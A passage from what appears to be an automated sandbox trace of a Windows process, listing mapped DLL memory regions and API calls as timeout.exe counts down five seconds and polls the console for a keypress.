"private_0x0000000000020000" filename = "" Region: id = 565 start_va = 0x76ae0000 end_va = 0x76b23fff monitored = 0 entry_point = 0x76af9d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 566 start_va = 0x75260000 end_va = 0x7530cfff monitored = 0 entry_point = 0x75274f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 567 start_va = 0x74450000 end_va = 0x7446dfff monitored = 0 entry_point = 0x7445b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 568 start_va = 0x74440000 end_va = 0x74449fff monitored = 0 entry_point = 0x74442a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 569 start_va = 0x74590000 end_va = 0x745e7fff monitored = 0 entry_point = 0x745d25c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 570 start_va = 0x77240000 end_va = 0x77284fff monitored = 0 entry_point = 0x7725de90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 571 start_va = 0x748c0000 end_va = 0x7497dfff monitored = 0 entry_point = 0x748f5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 572 start_va = 0x77290000 end_va = 0x7744cfff monitored = 0 entry_point = 0x77372a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 573 start_va = 0x6d490000 end_va = 0x6d497fff monitored = 0 entry_point = 0x6d4917b0 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 574 start_va = 0x1c0000 end_va = 0x1e9fff monitored = 0 entry_point = 0x1c5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 575 start_va = 0x4850000 end_va = 0x49d7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004850000" filename = "" Region: id = 576 start_va = 0x74ea0000 end_va = 0x74ecafff monitored = 0 entry_point = 0x74ea5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 577 start_va = 0x49e0000 end_va = 0x4b60fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000049e0000" filename = "" Region: id = 578 start_va = 0x4b70000 end_va = 0x5f6ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004b70000" filename = "" Region: id = 579 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 580 start_va = 0x190000 end_va = 0x190fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 581 start_va = 0x1a0000 end_va = 0x1a2fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "timeout.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\timeout.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\timeout.exe.mui") Region: id = 582 start_va = 0x1c0000 end_va = 0x1c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 583 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 584 start_va = 0x5f70000 end_va = 0x60fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005f70000" filename = "" Region: id = 585 start_va = 0x6100000 end_va = 0x6436fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 17 os_tid = 0xfb0 [0263.161] GetModuleHandleA (lpModuleName=0x0) returned 0x240000 [0263.162] __set_app_type (_Type=0x1) [0263.162] __p__fmode () returned 0x74974d6c [0263.162] __p__commode () returned 0x74975b1c [0263.162] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x244fe0) returned 0x0 [0263.162] __wgetmainargs (in: _Argc=0x246018, _Argv=0x24601c, _Env=0x246020, _DoWildCard=0, _StartInfo=0x24602c | out: _Argc=0x246018, _Argv=0x24601c, _Env=0x246020) returned 0 [0263.163] SetThreadUILanguage (LangId=0x0) returned 0x409 [0263.168] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0263.168] SetLastError (dwErrCode=0x0) [0263.168] VerSetConditionMask (ConditionMask=0x0, TypeMask=0x0, Condition=0x2) returned 0x18 [0263.168] VerSetConditionMask (ConditionMask=0x18, TypeMask=0x80000000, Condition=0x1) returned 0x1b [0263.168] VerSetConditionMask (ConditionMask=0x1b, TypeMask=0x80000000, Condition=0x20) returned 0x1801b [0263.168] RtlVerifyVersionInfo (VersionInfo=0xdf7d8, TypeMask=0x3, ConditionMask=0x1801b) returned 0x0 [0263.168] GetProcessHeap () returned 0x4750000 [0263.168] RtlAllocateHeap (HeapHandle=0x4750000, Flags=0xc, Size=0x10) returned 0x4757480 [0263.169] lstrlenW (lpString="") returned 0 [0263.169] GetProcessHeap () returned 0x4750000 [0263.169] RtlAllocateHeap (HeapHandle=0x4750000, Flags=0xc, Size=0x2) returned 0x4758558 [0263.169] GetProcessHeap () returned 0x4750000 [0263.169] RtlAllocateHeap (HeapHandle=0x4750000, Flags=0xc, Size=0x14) returned 0x4757090 [0263.169] GetProcessHeap () returned 0x4750000 [0263.169] RtlAllocateHeap (HeapHandle=0x4750000, Flags=0xc, Size=0x10) returned 0x4757378 [0263.169] GetProcessHeap () returned 0x4750000 [0263.169] RtlAllocateHeap (HeapHandle=0x4750000, Flags=0xc, Size=0x14) returned 0x47572a0 [0263.169] GetProcessHeap () returned 0x4750000 [0263.169] RtlAllocateHeap (HeapHandle=0x4750000, Flags=0xc, Size=0x14) returned 0x4752930 [0263.169] GetProcessHeap () returned 0x4750000 [0263.169] RtlAllocateHeap (HeapHandle=0x4750000, Flags=0xc, Size=0x14) returned 0x47589a8 [0263.169] GetProcessHeap () returned 0x4750000 [0263.169] RtlAllocateHeap (HeapHandle=0x4750000, Flags=0xc, Size=0x14) returned 0x47589c8 [0263.169] GetProcessHeap () returned 0x4750000 [0263.169] RtlAllocateHeap (HeapHandle=0x4750000, Flags=0xc, Size=0x10) returned 0x47574e0 [0263.169] GetProcessHeap () returned 0x4750000 [0263.169] RtlAllocateHeap (HeapHandle=0x4750000, Flags=0xc, Size=0x14) returned 0x47589e8 [0263.169] GetProcessHeap () returned 0x4750000 [0263.169] RtlAllocateHeap (HeapHandle=0x4750000, Flags=0xc, Size=0x14) returned 0x4757910 [0263.169] GetProcessHeap () returned 0x4750000 [0263.169] RtlAllocateHeap (HeapHandle=0x4750000, Flags=0xc, Size=0x14) returned 0x4757930 [0263.169] GetProcessHeap () returned 0x4750000 [0263.170] RtlAllocateHeap (HeapHandle=0x4750000, Flags=0xc, Size=0x14) returned 0x475c348 [0263.170] GetProcessHeap () returned 0x4750000 [0263.170] RtlAllocateHeap (HeapHandle=0x4750000, Flags=0xc, Size=0x10) returned 0x47573d8 [0263.170] GetProcessHeap () returned 0x4750000 [0263.170] RtlAllocateHeap (HeapHandle=0x4750000, Flags=0xc, Size=0x14) returned 0x475c308 [0263.170] GetProcessHeap () returned 0x4750000 [0263.170] RtlAllocateHeap (HeapHandle=0x4750000, Flags=0xc, Size=0x14) returned 0x475c228 [0263.170] GetProcessHeap () returned 0x4750000 [0263.170] RtlAllocateHeap (HeapHandle=0x4750000, Flags=0xc, Size=0x14) returned 0x475c248 [0263.170] GetProcessHeap () returned 0x4750000 [0263.170] RtlAllocateHeap (HeapHandle=0x4750000, Flags=0xc, Size=0x14) returned 0x475c388 [0263.170] SetThreadUILanguage (LangId=0x0) returned 0x409 [0263.170] SetLastError (dwErrCode=0x0) [0263.170] GetProcessHeap () returned 0x4750000 [0263.170] RtlAllocateHeap (HeapHandle=0x4750000, Flags=0xc, Size=0x14) returned 0x475c2c8 [0263.170] GetProcessHeap () returned 0x4750000 [0263.170] RtlAllocateHeap (HeapHandle=0x4750000, Flags=0xc, Size=0x14) returned 0x475c1e8 [0263.171] GetProcessHeap () returned 0x4750000 [0263.171] RtlAllocateHeap (HeapHandle=0x4750000, Flags=0xc, Size=0x14) returned 0x475c468 [0263.171] GetProcessHeap () returned 0x4750000 [0263.171] RtlAllocateHeap (HeapHandle=0x4750000, Flags=0xc, Size=0x14) returned 0x475c2e8 [0263.171] GetProcessHeap () returned 0x4750000 [0263.171] RtlAllocateHeap (HeapHandle=0x4750000, Flags=0xc, Size=0x14) returned 0x475c208 [0263.171] GetProcessHeap () returned 0x4750000 [0263.171] RtlAllocateHeap (HeapHandle=0x4750000, Flags=0xc, Size=0x10) returned 0x4757420 [0263.171] _memicmp (_Buf1=0x4757420, _Buf2=0x2410ac, _Size=0x7) returned 0 [0263.171] GetProcessHeap () returned 0x4750000 [0263.171] RtlAllocateHeap (HeapHandle=0x4750000, Flags=0xc, Size=0x208) returned 0x475c4e8 [0263.171] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x475c4e8, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\timeout.exe" (normalized: "c:\\windows\\syswow64\\timeout.exe")) returned 0x1f [0263.171] GetFileVersionInfoSizeExW (in: dwFlags=0x1, lpwstrFilename="C:\\Windows\\SysWOW64\\timeout.exe", lpdwHandle=0xdf8e4 | out: lpdwHandle=0xdf8e4) returned 0x76c [0263.172] GetProcessHeap () returned 0x4750000 [0263.172] RtlAllocateHeap (HeapHandle=0x4750000, Flags=0xc, Size=0x776) returned 0x475c6f8 [0263.172] GetFileVersionInfoExW (in: dwFlags=0x3, lpwstrFilename="C:\\Windows\\SysWOW64\\timeout.exe", dwHandle=0x0, dwLen=0x776, lpData=0x475c6f8 | out: lpData=0x475c6f8) returned 1 [0263.172] VerQueryValueW (in: pBlock=0x475c6f8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0xdf8ec, puLen=0xdf8f0 | out: lplpBuffer=0xdf8ec*=0x475caa8, puLen=0xdf8f0) returned 1 [0263.176] _memicmp (_Buf1=0x4757420, _Buf2=0x2410ac, _Size=0x7) returned 0 [0263.176] _vsnwprintf (in: _Buffer=0x475c4e8, _BufferCount=0x3f, _Format="\\StringFileInfo\\%04x%04x\\InternalName", _ArgList=0xdf8d0 | out: _Buffer="\\StringFileInfo\\040904b0\\InternalName") returned 37 [0263.176] VerQueryValueW (in: pBlock=0x475c6f8, lpSubBlock="\\StringFileInfo\\040904b0\\InternalName", lplpBuffer=0xdf8fc, puLen=0xdf8f8 | out: lplpBuffer=0xdf8fc*=0x475c8dc, puLen=0xdf8f8) returned 1 [0263.176] lstrlenW (lpString="timeout.exe") returned 11 [0263.176] lstrlenW (lpString="timeout.exe") returned 11 [0263.176] lstrlenW (lpString=".EXE") returned 4 [0263.177] StrStrIW (lpFirst="timeout.exe", lpSrch=".EXE") returned=".exe" [0263.177] lstrlenW (lpString="timeout.exe") returned 11 [0263.177] lstrlenW (lpString=".EXE") returned 4 [0263.177] _memicmp (_Buf1=0x4757420, _Buf2=0x2410ac, _Size=0x7) returned 0 [0263.177] lstrlenW (lpString="timeout") returned 7 [0263.178] GetProcessHeap () returned 0x4750000 [0263.178] RtlAllocateHeap (HeapHandle=0x4750000, Flags=0xc, Size=0x14) returned 0x475c268 [0263.178] GetProcessHeap () returned 0x4750000 [0263.178] RtlAllocateHeap (HeapHandle=0x4750000, Flags=0xc, Size=0x14) returned 0x475c3e8 [0263.178] GetProcessHeap () returned 0x4750000 [0263.178] RtlAllocateHeap (HeapHandle=0x4750000, Flags=0xc, Size=0x14) returned 0x475c488 [0263.178] GetProcessHeap () returned 0x4750000 [0263.178] RtlAllocateHeap (HeapHandle=0x4750000, Flags=0xc, Size=0x14) returned 0x475c148 [0263.178] GetProcessHeap () returned 0x4750000 [0263.178] RtlAllocateHeap (HeapHandle=0x4750000, Flags=0xc, Size=0x10) returned 0x475d290 [0263.181] _memicmp (_Buf1=0x475d290, _Buf2=0x2410ac, _Size=0x7) returned 0 [0263.181] GetProcessHeap () returned 0x4750000 [0263.181] RtlAllocateHeap (HeapHandle=0x4750000, Flags=0xc, Size=0xa0) returned 0x475d3d8 [0263.181] GetProcessHeap () returned 0x4750000 [0263.181] RtlAllocateHeap (HeapHandle=0x4750000, Flags=0xc, Size=0x14) returned 0x475c3c8 [0263.181] GetProcessHeap () returned 0x4750000 [0263.181] RtlAllocateHeap (HeapHandle=0x4750000, Flags=0xc, Size=0x14) returned 0x475c4a8 [0263.181] GetProcessHeap () returned 0x4750000 [0263.181] RtlAllocateHeap (HeapHandle=0x4750000, Flags=0xc, Size=0x14) returned 0x475c288 [0263.181] GetProcessHeap () returned 0x4750000 [0263.181] RtlAllocateHeap (HeapHandle=0x4750000, Flags=0xc, Size=0x10) returned 0x475d218 [0263.181] _memicmp (_Buf1=0x475d218, _Buf2=0x2410ac, _Size=0x7) returned 0 [0263.181] GetProcessHeap () returned 0x4750000 [0263.181] RtlAllocateHeap (HeapHandle=0x4750000, Flags=0xc, Size=0x200) returned 0x475e3b8 [0263.182] LoadStringW (in: hInstance=0x0, uID=0x15ed, lpBuffer=0x475e3b8, cchBufferMax=256 | out: lpBuffer="Type \"%s /?\" for usage.") returned 0x17 [0263.183] lstrlenW (lpString="Type \"%s /?\" for usage.") returned 23 [0263.183] GetProcessHeap () returned 0x4750000 [0263.183] RtlAllocateHeap (HeapHandle=0x4750000, Flags=0xc, Size=0x30) returned 0x47581b8 [0263.183] _vsnwprintf (in: _Buffer=0x475d3d8, _BufferCount=0x4f, _Format="Type \"%s /?\" for usage.", _ArgList=0xdf8d4 | out: _Buffer="Type \"TIMEOUT /?\" for usage.") returned 28 [0263.184] GetProcessHeap () returned 0x4750000 [0263.184] GetProcessHeap () returned 0x4750000 [0263.184] HeapValidate (hHeap=0x4750000, dwFlags=0x0, lpMem=0x475c6f8) returned 1 [0263.184] GetProcessHeap () returned 0x4750000 [0263.184] RtlSizeHeap (HeapHandle=0x4750000, Flags=0x0, MemoryPointer=0x475c6f8) returned 0x776 [0263.184] HeapFree (in: hHeap=0x4750000, dwFlags=0x0, lpMem=0x475c6f8 | out: hHeap=0x4750000) returned 1 [0263.185] SetLastError (dwErrCode=0x0) [0263.185] GetThreadLocale () returned 0x409 [0263.185] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0263.185] lstrlenW (lpString="?") returned 1 [0263.185] GetThreadLocale () returned 0x409 [0263.185] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0263.185] GetThreadLocale () returned 0x409 [0263.185] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0263.185] lstrlenW (lpString="nobreak") returned 7 [0263.185] SetLastError (dwErrCode=0x0) [0263.185] SetLastError (dwErrCode=0x0) [0263.185] lstrlenW (lpString="/t") returned 2 [0263.185] lstrlenW (lpString="-/") returned 2 [0263.185] StrChrIW (lpStart="-/", wMatch=0x60f002f) returned="/" [0263.185] lstrlenW (lpString="?") returned 1 [0263.185] lstrlenW (lpString="?") returned 1 [0263.185] GetProcessHeap () returned 0x4750000 [0263.185] RtlAllocateHeap (HeapHandle=0x4750000, Flags=0xc, Size=0x10) returned 0x475d260 [0263.186] _memicmp (_Buf1=0x475d260, _Buf2=0x2410ac, _Size=0x7) returned 0 [0263.186] GetProcessHeap () returned 0x4750000 [0263.186] RtlAllocateHeap (HeapHandle=0x4750000, Flags=0xc, Size=0xa) returned 0x475d1d0 [0263.186] lstrlenW (lpString="t") returned 1 [0263.186] GetProcessHeap () returned 0x4750000 [0263.186] RtlAllocateHeap (HeapHandle=0x4750000, Flags=0xc, Size=0x10) returned 0x475cff0 [0263.186] _memicmp (_Buf1=0x475cff0, _Buf2=0x2410ac, _Size=0x7) returned 0 [0263.186] GetProcessHeap () returned 0x4750000 [0263.186] RtlAllocateHeap (HeapHandle=0x4750000, Flags=0xc, Size=0xa) returned 0x475d068 [0263.186] _vsnwprintf (in: _Buffer=0x475d1d0, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdf8c4 | out: _Buffer="|?|") returned 3 [0263.186] _vsnwprintf (in: _Buffer=0x475d068, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdf8c4 | out: _Buffer="|t|") returned 3 [0263.186] lstrlenW (lpString="|?|") returned 3 [0263.186] lstrlenW (lpString="|t|") returned 3 [0263.186] StrStrIW (lpFirst="|?|", lpSrch="|t|") returned 0x0 [0263.186] SetLastError (dwErrCode=0x490) [0263.186] lstrlenW (lpString="t") returned 1 [0263.186] lstrlenW (lpString="t") returned 1 [0263.186] _memicmp (_Buf1=0x475d260, _Buf2=0x2410ac, _Size=0x7) returned 0 [0263.186] lstrlenW (lpString="t") returned 1 [0263.186] _memicmp (_Buf1=0x475cff0, _Buf2=0x2410ac, _Size=0x7) returned 0 [0263.186] _vsnwprintf (in: _Buffer=0x475d1d0, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdf8c4 | out: _Buffer="|t|") returned 3 [0263.186] _vsnwprintf (in: _Buffer=0x475d068, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdf8c4 | out: _Buffer="|t|") returned 3 [0263.187] lstrlenW (lpString="|t|") returned 3 [0263.187] lstrlenW (lpString="|t|") returned 3 [0263.187] StrStrIW (lpFirst="|t|", lpSrch="|t|") returned="|t|" [0263.187] SetLastError (dwErrCode=0x0) [0263.187] SetLastError (dwErrCode=0x0) [0263.187] lstrlenW (lpString="5") returned 1 [0263.187] SetLastError (dwErrCode=0x490) [0263.187] SetLastError (dwErrCode=0x0) [0263.187] lstrlenW (lpString="5") returned 1 [0263.187] StrChrIW (lpStart="5", wMatch=0x3a) returned 0x0 [0263.187] SetLastError (dwErrCode=0x490) [0263.187] SetLastError (dwErrCode=0x0) [0263.187] GetProcessHeap () returned 0x4750000 [0263.187] RtlAllocateHeap (HeapHandle=0x4750000, Flags=0xc, Size=0x10) returned 0x475d1e8 [0263.188] _memicmp (_Buf1=0x475d1e8, _Buf2=0x2410ac, _Size=0x7) returned 0 [0263.188] lstrlenW (lpString="5") returned 1 [0263.188] GetProcessHeap () returned 0x4750000 [0263.188] RtlAllocateHeap (HeapHandle=0x4750000, Flags=0xc, Size=0x4) returned 0x4752950 [0263.188] lstrlenW (lpString="5") returned 1 [0263.188] lstrlenW (lpString=" \x09") returned 2 [0263.188] StrChrW (lpStart=" \x09", wMatch=0x35) returned 0x0 [0263.188] StrChrW (lpStart=" \x09", wMatch=0x35) returned 0x0 [0263.188] GetLastError () returned 0x0 [0263.188] lstrlenW (lpString="5") returned 1 [0263.188] lstrlenW (lpString="5") returned 1 [0263.188] SetLastError (dwErrCode=0x0) [0263.188] _errno () returned 0x60f05b0 [0263.188] wcstol (in: _String="5", _EndPtr=0xdfab8, _Radix=10 | out: _EndPtr=0xdfab8*="") returned 5 [0263.188] lstrlenW (lpString="") returned 0 [0263.188] _errno () returned 0x60f05b0 [0263.188] time (in: timer=0xdfae0 | out: timer=0xdfae0) returned 0x623a98b0 [0263.188] GetStdHandle (nStdHandle=0xfffffff6) returned 0x38 [0263.188] GetFileType (hFile=0x38) returned 0x2 [0263.189] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0xdfab0 | out: lpMode=0xdfab0) returned 1 [0263.194] GetStdHandle (nStdHandle=0xfffffff6) returned 0x38 [0263.194] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0xdfad0 | out: lpMode=0xdfad0) returned 1 [0263.196] SetConsoleMode (hConsoleHandle=0x38, dwMode=0x1a1) returned 1 [0263.200] GetNumberOfConsoleInputEvents (in: hConsoleInput=0x38, lpNumberOfEvents=0xdfad4 | out: lpNumberOfEvents=0xdfad4) returned 1 [0263.203] FlushConsoleInputBuffer (hConsoleInput=0x38) returned 1 [0263.205] GetProcessHeap () returned 0x4750000 [0263.205] RtlAllocateHeap (HeapHandle=0x4750000, Flags=0xc, Size=0x14) returned 0x475c3a8 [0263.205] _memicmp (_Buf1=0x475d218, _Buf2=0x2410ac, _Size=0x7) returned 0 [0263.205] LoadStringW (in: hInstance=0x0, uID=0x98, lpBuffer=0x475e3b8, cchBufferMax=256 | out: lpBuffer="\nWaiting for %*lu") returned 0x11 [0263.205] lstrlenW (lpString="\nWaiting for %*lu") returned 17 [0263.205] GetProcessHeap () returned 0x4750000 [0263.205] RtlAllocateHeap (HeapHandle=0x4750000, Flags=0xc, Size=0x24) returned 0x4753828 [0263.205] _vsnwprintf (in: _Buffer=0xdfd24, _BufferCount=0xfd, _Format="\nWaiting for %*lu", _ArgList=0xdfa9c | out: _Buffer="\nWaiting for 5") returned 14 [0263.205] __iob_func () returned 0x74971208 [0263.205] _fileno (_File=0x74971228) returned 1 [0263.205] _errno () returned 0x60f05b0 [0263.205] _get_osfhandle (_FileHandle=1) returned 0x3c [0263.205] _errno () returned 0x60f05b0 [0263.205] GetFileType (hFile=0x3c) returned 0x2 [0263.205] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0263.205] GetFileType (hFile=0x3c) returned 0x2 [0263.206] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xdfa74 | out: lpMode=0xdfa74) returned 1 [0263.207] __iob_func () returned 0x74971208 [0263.207] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0263.207] lstrlenW (lpString="\nWaiting for 5") returned 14 [0263.208] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0xdfd24*, nNumberOfCharsToWrite=0xe, lpNumberOfCharsWritten=0xdfa98, lpReserved=0x0 | out: lpBuffer=0xdfd24*, lpNumberOfCharsWritten=0xdfa98*=0xe) returned 1 [0263.212] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0263.212] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x3c, lpConsoleScreenBufferInfo=0xdfae8 | out: lpConsoleScreenBufferInfo=0xdfae8) returned 1 [0263.217] GetProcessHeap () returned 0x4750000 [0263.217] RtlAllocateHeap (HeapHandle=0x4750000, Flags=0xc, Size=0x14) returned 0x475c108 [0263.217] _memicmp (_Buf1=0x475d218, _Buf2=0x2410ac, _Size=0x7) returned 0 [0263.217] LoadStringW (in: hInstance=0x0, uID=0xa0, lpBuffer=0x475e3b8, cchBufferMax=256 | out: lpBuffer=" seconds, press a key to continue ...") returned 0x25 [0263.217] lstrlenW (lpString=" seconds, press a key to continue ...") returned 37 [0263.217] GetProcessHeap () returned 0x4750000 [0263.217] RtlAllocateHeap (HeapHandle=0x4750000, Flags=0xc, Size=0x4c) returned 0x4756ee0 [0263.217] __iob_func () returned 0x74971208 [0263.217] _fileno (_File=0x74971228) returned 1 [0263.217] _errno () returned 0x60f05b0 [0263.217] _get_osfhandle (_FileHandle=1) returned 0x3c [0263.217] _errno () returned 0x60f05b0 [0263.217] GetFileType (hFile=0x3c) returned 0x2 [0263.218] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0263.218] GetFileType (hFile=0x3c) returned 0x2 [0263.218] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xdfa74 | out: lpMode=0xdfa74) returned 1 [0263.224] __iob_func () returned 0x74971208 [0263.224] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0263.224] lstrlenW (lpString=" seconds, press a key to continue ...") returned 37 [0263.224] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x4756ee0*, nNumberOfCharsToWrite=0x25, lpNumberOfCharsWritten=0xdfa98, lpReserved=0x0 | out: lpBuffer=0x4756ee0*, lpNumberOfCharsWritten=0xdfa98*=0x25) returned 1 [0263.232] PeekConsoleInputW (in: hConsoleInput=0x38, lpBuffer=0xdfb00, nLength=0x2, lpNumberOfEventsRead=0xdfad4 | out: lpBuffer=0xdfb00, lpNumberOfEventsRead=0xdfad4) returned 1 [0263.233] time (in: timer=0xdfae0 | out: timer=0xdfae0) returned 0x623a98b0 [0263.233] Sleep (dwMilliseconds=0x64) [0263.517] PeekConsoleInputW (in: hConsoleInput=0x38, lpBuffer=0xdfb00, nLength=0x2, lpNumberOfEventsRead=0xdfad4 | out: lpBuffer=0xdfb00, lpNumberOfEventsRead=0xdfad4) returned 1 [0263.574] time (in: timer=0xdfae0 | out: timer=0xdfae0) returned 0x623a98b0 [0263.574] Sleep (dwMilliseconds=0x64) [0263.755] PeekConsoleInputW (in: hConsoleInput=0x38, lpBuffer=0xdfb00, nLength=0x2, lpNumberOfEventsRead=0xdfad4 | out: lpBuffer=0xdfb00, lpNumberOfEventsRead=0xdfad4) returned 1 [0263.762] time (in: timer=0xdfae0 | out: timer=0xdfae0) returned 0x623a98b0 [0263.763] Sleep (dwMilliseconds=0x64) [0263.897] PeekConsoleInputW (in: hConsoleInput=0x38, lpBuffer=0xdfb00, nLength=0x2, lpNumberOfEventsRead=0xdfad4 | out: lpBuffer=0xdfb00, lpNumberOfEventsRead=0xdfad4) returned 1 [0263.906] time (in: timer=0xdfae0 | out: timer=0xdfae0) returned 0x623a98b0 [0263.906] Sleep (dwMilliseconds=0x64) [0264.034] PeekConsoleInputW (in: hConsoleInput=0x38, lpBuffer=0xdfb00, nLength=0x2, lpNumberOfEventsRead=0xdfad4 | out: lpBuffer=0xdfb00, lpNumberOfEventsRead=0xdfad4) returned 1 [0264.041] time (in: timer=0xdfae0 | out: timer=0xdfae0) returned 0x623a98b0 [0264.041] Sleep (dwMilliseconds=0x64) [0264.143] PeekConsoleInputW (in: hConsoleInput=0x38, lpBuffer=0xdfb00, nLength=0x2, lpNumberOfEventsRead=0xdfad4 | out: lpBuffer=0xdfb00, lpNumberOfEventsRead=0xdfad4) returned 1 [0264.146] time (in: timer=0xdfae0 | out: timer=0xdfae0) returned 0x623a98b1 [0264.146] _vsnwprintf (in: _Buffer=0xdfd24, _BufferCount=0xfd, _Format="%s%*lu", _ArgList=0xdfa98 | out: _Buffer="\x084") returned 2 [0264.146] SetConsoleCursorPosition (hConsoleOutput=0x3c, dwCursorPosition=0x1000d) returned 1 [0264.149] __iob_func () returned 0x74971208 [0264.149] _fileno (_File=0x74971228) returned 1 [0264.149] _errno () returned 0x60f05b0 [0264.149] _get_osfhandle (_FileHandle=1) returned 0x3c [0264.149] _errno () returned 0x60f05b0 [0264.149] GetFileType (hFile=0x3c) returned 0x2 [0264.150] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0264.150] GetFileType (hFile=0x3c) returned 0x2 [0264.150] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xdfa74 | out: lpMode=0xdfa74) returned 1 [0264.153] __iob_func () returned 0x74971208 [0264.153] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0264.153] lstrlenW (lpString="\x084") returned 2 [0264.153] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0xdfd24*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xdfa98, lpReserved=0x0 | out: lpBuffer=0xdfd24*, lpNumberOfCharsWritten=0xdfa98*=0x2) returned 1 [0264.157] Sleep (dwMilliseconds=0x64) [0264.260] PeekConsoleInputW (in: hConsoleInput=0x38, lpBuffer=0xdfb00, nLength=0x2, lpNumberOfEventsRead=0xdfad4 | out: lpBuffer=0xdfb00, lpNumberOfEventsRead=0xdfad4) returned 1 [0264.261] time (in: timer=0xdfae0 | out: timer=0xdfae0) returned 0x623a98b1 [0264.261] Sleep (dwMilliseconds=0x64) [0264.429] PeekConsoleInputW (in: hConsoleInput=0x38, lpBuffer=0xdfb00, nLength=0x2, lpNumberOfEventsRead=0xdfad4 | out: lpBuffer=0xdfb00, lpNumberOfEventsRead=0xdfad4) returned 1 [0264.436] time (in: timer=0xdfae0 | out: timer=0xdfae0) returned 0x623a98b1 [0264.436] Sleep (dwMilliseconds=0x64) [0264.592] PeekConsoleInputW (in: hConsoleInput=0x38, lpBuffer=0xdfb00, nLength=0x2, lpNumberOfEventsRead=0xdfad4 | out: lpBuffer=0xdfb00, lpNumberOfEventsRead=0xdfad4) returned 1 [0264.597] time (in: timer=0xdfae0 | out: timer=0xdfae0) returned 0x623a98b1 [0264.597] Sleep (dwMilliseconds=0x64) [0264.727] PeekConsoleInputW (in: hConsoleInput=0x38, lpBuffer=0xdfb00, nLength=0x2, lpNumberOfEventsRead=0xdfad4 | out: lpBuffer=0xdfb00, lpNumberOfEventsRead=0xdfad4) returned 1 [0264.736] time (in: timer=0xdfae0 | out: timer=0xdfae0) returned 0x623a98b1 [0264.736] Sleep (dwMilliseconds=0x64) [0264.838] 